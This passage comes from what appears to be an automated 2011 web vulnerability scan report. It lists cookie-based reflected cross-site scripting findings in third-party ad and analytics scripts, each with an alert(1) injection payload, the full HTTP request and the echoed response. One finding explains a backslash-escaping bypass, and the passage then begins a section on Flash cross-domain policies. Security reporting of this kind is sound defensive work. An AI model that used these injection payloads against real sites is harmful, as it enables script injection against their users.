P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 13 Jun 2011 11:23:38 GMT
Content-Length: 8709
Connection: close
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Tue, 14-Jun-2011 11:23:38 GMT
Set-Cookie: exdp=1; domain=collective-media.net; path=/; expires=Mon, 20-Jun-2011 11:23:38 GMT
Set-Cookie: ibvr=1; domain=collective-media.net; path=/; expires=Mon, 20-Jun-2011 11:23:38 GMT
Set-Cookie: targ=1; domain=collective-media.net; path=/; expires=Mon, 20-Jun-2011 11:23:38 GMT

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
</scr'+'ipt>');CollectiveMedia.addPixel("http://pixel.quantserve.com/seg/r;a=p-86ZJnSph3DaTI;rand=792990767;redirect=http://a.collective-media.net/datapair?net=qc&id=120221f8320d7dcc73d3";alert(1)//8100ae70af7&segs=!qcsegs&op=add",true);CollectiveMedia.addPixel("http://load.exelator.com/load/?p=104&g=210&j=0",false);CollectiveMedia.addPixel("http://ev.ib-ibi.com/image.sbix?go=2223&pid=15",false);CollectiveM
...[SNIP]...

4.277. http://k.collective-media.net/cmadj/cm.mtv/ent_010111 [cli cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://k.collective-media.net
Path:	/cmadj/cm.mtv/ent_010111

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fbb22'%3balert(1)//a7774ed20a2 was submitted in the cli cookie. This input was echoed as fbb22';alert(1)//a7774ed20a2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /cmadj/cm.mtv/ent_010111;sz=728x90;net=cm;ord=[timestamp];env=ifr;ord1=388700;cmpgurl=http%253A//view.atdmt.com/PTR/iview/240321409/direct%253Bwi.1%253Bhi.1/01%253Frelocate%253Dhttp%253A//viacom.adbureau.net/AFTRSERVER/hserver//acc_random%253D379297/site%253Dmtv.mtvi/aamsz%253D728x90/? HTTP/1.1
Host: k.collective-media.net
Proxy-Connection: keep-alive
Referer: http://viacom.adbureau.net/AFTRSERVER/hserver//acc_random=379297/site=mtv.mtvi/aamsz=728x90//ATCI=1305305557-4079447
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=120221f8320d7dcfbb22'%3balert(1)//a7774ed20a2; JY57=332jXJ1Pqjj-HqZYNcOZJMDRxyMFbPVXvMReGdRQ2Q3tgRpc00YOW1w; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 8709
Date: Mon, 13 Jun 2011 11:23:38 GMT
Connection: close
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Tue, 14-Jun-2011 11:23:38 GMT
Set-Cookie: exdp=1; domain=collective-media.net; path=/; expires=Mon, 20-Jun-2011 11:23:38 GMT
Set-Cookie: ibvr=1; domain=collective-media.net; path=/; expires=Mon, 20-Jun-2011 11:23:38 GMT
Set-Cookie: targ=1; domain=collective-media.net; path=/; expires=Mon, 20-Jun-2011 11:23:38 GMT

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-10211384526_1307964218","http://ib.adnxs.com/ptj?member=311&inv_code=cm.mtv&size=728x90&imp_id=cm-10211384526_1307964218,120221f8320d7dcfbb22';alert(1)//a7774ed20a2&referrer=http%3A%2F%2Fview.atdmt.com%2FPTR%2Fiview%2F240321409%2Fdirect%3Bwi.1%3Bhi.1%2F01%3Frelocate%3Dhttp%3A%2F%2Fviacom.adbureau.net%2FAFTRSERVER%2Fhserver%2Facc_random%3D379297%2Fsite%3Dmtv.mtvi%
...[SNIP]...

4.278. http://optimized-by.rubiconproject.com/a/5941/13464/26379-2.js [ruid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/5941/13464/26379-2.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9e33"-alert(1)-"8777156d24b was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /a/5941/13464/26379-2.js?cb=0.7753647894132882 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://fansided.com/category/nba/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2146=xn7ja41kw4np53teeikidoecxeh9fu6s; au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_1197=3460050161923843111; put_2081=AG-00000001389358554; put_1185=4325897289836481830; ruid=d9e33"-alert(1)-"8777156d24b; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; ses2=13464^2; cd=false; lm="13 Jun 2011 11:13:38 GMT"; rpb=3580%3D1%264222%3D1%266811%3D1%264940%3D1%264894%3D1%265852%3D1%264210%3D1%264214%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%262373%3D1%263810%3D1%262374%3D1; rdk=5941/13464; rdk9=0; ses9=13464^2

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:22:07 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=5941/13464; expires=Mon, 13-Jun-2011 12:22:07 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Mon, 13-Jun-2011 12:22:07 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=13464^4; expires=Tue, 14-Jun-2011 04:59:59 GMT; max-age=74272; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2400

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3168960"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=d9e33"-alert(1)-"8777156d24b\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

4.279. http://optimized-by.rubiconproject.com/a/5941/13464/26379-9.js [ruid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/5941/13464/26379-9.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6e46"-alert(1)-"0b832c94b48 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /a/5941/13464/26379-9.js?cb=0.601756411138922 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/aboutcontact-us/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2146=xn7ja41kw4np53teeikidoecxeh9fu6s; au=GNQQ9N2W-FJJG-10.204.178.130; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; lm="21 May 2011 12:38:06 GMT"; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; cd=false; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_1197=3460050161923843111; put_2081=AG-00000001389358554; put_1185=4325897289836481830; ruid=b6e46"-alert(1)-"0b832c94b48; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rdk=5941/13464; ses2=13464^1; rpb=3580%3D1%264222%3D1%266811%3D1%265421%3D1%264940%3D1%264894%3D1%265852%3D1%264210%3D1%264214%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:21:23 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=5941/13464; expires=Mon, 13-Jun-2011 12:21:23 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk9=0; expires=Mon, 13-Jun-2011 12:21:23 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses9=13464^4; expires=Tue, 14-Jun-2011 04:59:59 GMT; max-age=74316; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2332

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3168962"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=b6e46"-alert(1)-"0b832c94b48\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

4.280. http://s26.sitemeter.com/js/counter.asp [IP cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://s26.sitemeter.com
Path:	/js/counter.asp

Issue detail

The value of the IP cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9a330"%3balert(1)//4a182eca902 was submitted in the IP cookie. This input was echoed as 9a330";alert(1)//4a182eca902 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /js/counter.asp?site=s26mavsmoneyball&ocd=1 HTTP/1.1
Host: s26.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://www.mavsmoneyball.com/fanposts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: IP=173%2E193%2E214%2E2439a330"%3balert(1)//4a182eca902

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 13 Jun 2011 11:20:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7233
Content-Type: application/x-javascript
Expires: Mon, 13 Jun 2011 11:30:57 GMT
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServerName;
       SiteMeter.SecurityCode = sSecurityCode;
       SiteMeter.IP = "173.193.214.2439a330";alert(1)//4a182eca902";
       SiteMeter.trackingImage = new Image();
       SiteMeter.dgOutlinkImage = new Image();

       if (typeof(g_sLastCodeName) != 'undefined')
           if (g_sLastCodeName == sCodeName)
               return;

       SiteMete
...[SNIP]...

4.281. http://s26.sitemeter.com/js/counter.js [IP cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://s26.sitemeter.com
Path:	/js/counter.js

Issue detail

The value of the IP cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5499d"%3balert(1)//5b3b69998f1 was submitted in the IP cookie. This input was echoed as 5499d";alert(1)//5b3b69998f1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /js/counter.js?site=s26mavsmoneyball&ocd=1 HTTP/1.1
Host: s26.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://www.mavsmoneyball.com/fanposts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: IP=173%2E193%2E214%2E2435499d"%3balert(1)//5b3b69998f1

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 13 Jun 2011 11:21:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7233
Content-Type: application/x-javascript
Expires: Mon, 13 Jun 2011 11:31:02 GMT
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServerName;
       SiteMeter.SecurityCode = sSecurityCode;
       SiteMeter.IP = "173.193.214.2435499d";alert(1)//5b3b69998f1";
       SiteMeter.trackingImage = new Image();
       SiteMeter.dgOutlinkImage = new Image();

       if (typeof(g_sLastCodeName) != 'undefined')
           if (g_sLastCodeName == sCodeName)
               return;

       SiteMete
...[SNIP]...

4.282. http://www2.glam.com/app/site/affiliate/viewChannelModule.act [ctags cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www2.glam.com
Path:	/app/site/affiliate/viewChannelModule.act

Issue detail

The value of the ctags cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 99f7f\'%3balert(1)//8b53eae76f0 was submitted in the ctags cookie. This input was echoed as 99f7f\\';alert(1)//8b53eae76f0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /app/site/affiliate/viewChannelModule.act?mName=viewAdJs&affiliateId=1000212071&adSize=300x250 HTTP/1.1
Host: www2.glam.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: glam_sid=115232130551023312111; ctags=%3bct%3dpacsun%3bct%3dxboxk390599f7f\'%3balert(1)//8b53eae76f0

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Type: application/x-javascript
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Cache-Control: max-age=450
Date: Mon, 13 Jun 2011 11:02:09 GMT
Content-Length: 60048
Connection: close

// 
// 

window.glam_session = new Object();
window.glam_session.country_code = null;
/*
*/

window.glam_session.edge = true;

window.glam_session.glam_sid='115232130551023312111';

window.glam_session.ctags=';ct=pacsun;ct=xboxk390599f7f\\';alert(1)//8b53eae76f0';

window.glam_session.country_code='US';

window.glam_session.dma='511';

window.glam_session.region_code='DC';

window.glam_session.sid_set=1;

window.glam_session.user_agent_type='2';

docu
...[SNIP]...

4.283. http://www2.glam.com/app/site/affiliate/viewChannelModule.act [glam_sid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www2.glam.com
Path:	/app/site/affiliate/viewChannelModule.act

Issue detail

The value of the glam_sid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ca4e2\'%3balert(1)//67a7241f268 was submitted in the glam_sid cookie. This input was echoed as ca4e2\\';alert(1)//67a7241f268 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /app/site/affiliate/viewChannelModule.act?mName=viewAdJs&affiliateId=1000212071&adSize=300x250 HTTP/1.1
Host: www2.glam.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: glam_sid=115232130551023312111ca4e2\'%3balert(1)//67a7241f268; ctags=%3bct%3dpacsun%3bct%3dxboxk3905

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Type: application/x-javascript
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Cache-Control: max-age=450
Date: Mon, 13 Jun 2011 11:02:09 GMT
Content-Length: 60048
Connection: close

// 
// 

window.glam_session = new Object();
window.glam_session.country_code = null;
/*
*/

window.glam_session.edge = true;

window.glam_session.glam_sid='115232130551023312111ca4e2\\';alert(1)//67a7241f268';

window.glam_session.ctags=';ct=pacsun;ct=xboxk3905';

window.glam_session.country_code='US';

window.glam_session.dma='511';

window.glam_session.region_code='DC';

window.glam_session.sid_set=1;

...[SNIP]...

4.284. http://www2.glam.com/app/site/affiliate/viewChannelModule.act [qcsegs cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www2.glam.com
Path:	/app/site/affiliate/viewChannelModule.act

Issue detail

The value of the qcsegs cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73333\'%3balert(1)//95067bdca83 was submitted in the qcsegs cookie. This input was echoed as 73333\\';alert(1)//95067bdca83 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /app/site/affiliate/viewChannelModule.act?mName=viewAdJs&affiliateId=1000212071&adSize=160x600 HTTP/1.1
Host: www2.glam.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: glam_sid=115232130551023312111; ctags=%3bct%3dpacsun%3bct%3dxboxk3905; bkpix2=1; qcsegs=D,T,5150,3726,2951,2705,2698,2695,2693,2692,2690,177173333\'%3balert(1)//95067bdca83

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Type: application/x-javascript
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Cache-Control: max-age=450
Date: Mon, 13 Jun 2011 11:03:05 GMT
Content-Length: 59854
Connection: close

// 
// 

window.glam_session = new Object();
window.glam_session.countr
...[SNIP]...
e = true;

window.glam_session.glam_sid='115232130551023312111';

window.glam_session.ctags=';ct=pacsun;ct=xboxk3905';

window.glam_session.qcsegs='D,T,5150,3726,2951,2705,2698,2695,2693,2692,2690,177173333\\';alert(1)//95067bdca83';

window.glam_session.country_code='US';

window.glam_session.dma='511';

window.glam_session.region_code='DC';

window.glam_session.sid_set=1;

window.glam_session.user_agent_type='2';

fu
...[SNIP]...

4.285. http://www35.glam.com/gad/glamadapt_jsrv.act [glam_sid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www35.glam.com
Path:	/gad/glamadapt_jsrv.act

Issue detail

The value of the glam_sid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55a4c'-alert(1)-'d2b57a87d11 was submitted in the glam_sid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /gad/glamadapt_jsrv.act?;flg=64;;zone=/;nt=b;cc=us;aft=p;ec=ron;p=0;p=1;!c=nae;!c=s;!c=sf;al=walmartdv;ec=tsp;ia=mf;jpbrash=admax;pec=sp;psh=y;rmt=exp;vec=sp;vpec=sp;ct=pacsun;ct=xboxk3905;atf=0;pfl=3;dt=s;!c=hagl;!c=hagn;pt=0;afid=1000212071;dsid=864279;pt=sk;gsz=888x11:999,300x250:1;uv=10;;tt=j;u=b0021fawbst1ssbzd4i,f0f02sa,g10001s;sz=300x250;tile=1;ord=4876240110024810;;afid=1000212071;dsid=864279;url=txanco;seq=1;ux=f-f02sa,tid-1,pid-fawbst1ssbzd4i,aid-2,g-64,1,;_glt=300:1:6:2:1:979:2011:6:13;a_tz=-300;_g_cv=2; HTTP/1.1
Host: www35.glam.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: glam_sid=11523213055102331211155a4c'-alert(1)-'d2b57a87d11; ctags=%3bct%3dpacsun%3bct%3dxboxk3905; bkpix2=1

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: application/x-javascript
ETag: "d398cadfb255eaeb5658516ed12d9db3:1307759730"
X-Glam-Bdata: XGlamBData,nbt,ls,rs
X-Glam-AdId: 5000042623
X-Glam-Euid: 3b525c615fbe6201c14fd71ad257c196
X-Powered-By: GlamAdapt/ASE/1.5
Vary: Accept-Encoding
Expires: Mon, 13 Jun 2011 11:02:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 13 Jun 2011 11:02:12 GMT
Content-Length: 3800
Connection: close

...[SNIP]...
teInfo ) {
window.GlamGetAffiliateInfo = function(pName) {
var glam_info = new Object();
var glam_affiliate_vars = 'js_mode=show;_ge_=3^2^3b525c615fbe6201c14fd71ad257c196;sid=11523213055102331211155a4c'-alert(1)-'d2b57a87d11;browser=None;co=US;dma=511;;;;flg=64;;zone=/;nt=b;cc=us;aft=p;ec=ron;p=0;p=1;!c=nae;!c=s;!c=sf;al=walmartdv;ec=tsp;ia=mf;jpbrash=admax;pec=sp;psh=y;rmt=exp;vec=sp;vpec=sp;ct=pacsun;ct=xboxk3905;atf=0;
...[SNIP]...

5. Flash cross-domain policy previous next
There are 15 instances of this issue:

http://altfarm.mediaplex.com/crossdomain.xml
http://d.xp1.ru4.com/crossdomain.xml
http://dg.specificclick.net/crossdomain.xml
http://load.exelator.com/crossdomain.xml
http://m.xp1.ru4.com/crossdomain.xml
http://matrix.hbo.com/crossdomain.xml
http://pix04.revsci.net/crossdomain.xml
http://secure-us.imrworldwide.com/crossdomain.xml
http://segment-pixel.invitemedia.com/crossdomain.xml
http://server.cpmstar.com/crossdomain.xml
http://tags.bluekai.com/crossdomain.xml
http://ad.wsod.com/crossdomain.xml
http://ads.adbrite.com/crossdomain.xml
http://my.yahoo.com/crossdomain.xml
http://s.media-imdb.com/crossdomain.xml

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

5.1. http://altfarm.mediaplex.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
